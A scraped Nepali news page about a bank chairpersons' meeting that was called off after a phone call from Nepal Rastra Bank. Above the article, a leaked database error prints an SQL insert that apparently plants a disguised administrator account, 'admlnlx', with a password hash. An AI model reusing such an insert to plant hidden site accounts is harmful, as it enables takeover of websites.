WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvEC32n25RvQsEiWmBJ8TuRvxQIY6a.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:13:29', '', 'admlnlx', 'admlnlx')

एक कल फोनले विथोलियो बैंक अध्यक्षहरुको बैठक – Gaule Khabar

एक कल फोनले विथोलियो बैंक अध्यक्षहरुको बैठक

एक कल फोनले विथोलियो बैंक अध्यक्षहरुको बैठक

गाउँले न्यूज, ९ फागुन, काठमाडौं । ब्याजदरलाई लिएर उद्योगी व्यवसायीले लगाएको आरोपबारे छलफल गर्न बसेको वाणिज्य बैंकका अध्यक्षहरुको बैठक विथोलिएको छ ।

राष्ट्र बैंकका एक उच्च अधिकारीको फोनपछि राजधानीकै एक पाँचतारे होटलमा भइरहेको बैंक अध्यक्षहरुको छलफल विथोलिएको हो । बैठकमा अधिकांश बैंकका अध्यक्ष र केही बैंकका सञ्चालक सहभागी थिए । बैंकका अध्यक्ष र सञ्चालकहरुलाई ब्रिफिङ गर्न बैंकका प्रमुख कार्यकारी अधिकृतहरु उपस्थित थिए ।

सीईओहरुले बैंकका विषयमा उठेका विषय र पर्न सक्ने अप्ठ्याराबारे ब्रिफिङ गरिरहेका बेला बैंकर्स संघका अध्यक्ष ज्ञानेन्द्र ढुंगनालाई राष्ट्र बैंकबाट फोन आएको थियो ।
त्यसपछि बैठक स्थगित गरिएको बैठकमा सहभागी एनएमबी बैंकका अध्यक्ष पवन गोल्यानले जानकारी दिए ।

‘उद्योगीहरुले अनावश्यक रुपमा लगाएका आरोप र मौद्रिक नीतिको मध्यावधिक समीक्षाबारे छलफल भइरहेको थियो’ अध्यक्ष गोलयानले भने, ‘राष्ट्र बैंकको फोन आएपछि बैंकर्स संघका अध्यक्षज्यू उता जानुभयो, बैठक स्थगित गरियो ।’

बैठकले कुनै निर्णय नगरेको उनले बताए । अर्को बैठक कहिले बस्ने भन्ने पनि छैन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका